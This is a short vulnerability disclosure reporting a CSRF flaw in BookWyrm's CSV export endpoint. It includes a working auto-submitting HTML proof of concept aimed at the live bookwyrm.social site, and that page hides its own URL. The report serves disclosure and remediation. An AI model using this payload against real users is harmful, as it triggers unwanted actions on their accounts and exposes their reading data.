Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm
Jul 11th 2022
An attacker can trigger the CSV export on behalf of a logged-in user: the export endpoint (/preferences/export/file) is reachable with a plain GET request and no CSRF token, so a page under the attacker's control can submit the request from the victim's browser. The export includes every book on the user's shelves, books the user has reviewed, and books with reading activity.
Proof of Concept
<html>
  <body>
    <!-- Hide the attacker page's real URL from the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- A GET form: no CSRF token is needed, so the victim's cookies authorize the export -->
    <form action="https://bookwyrm.social/preferences/export/file">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // document.forms is a collection; the first (only) form is submitted
      document.forms[0].submit();
    </script>
  </body>
</html>
This vulnerability allows an attacker to download a user's reading data.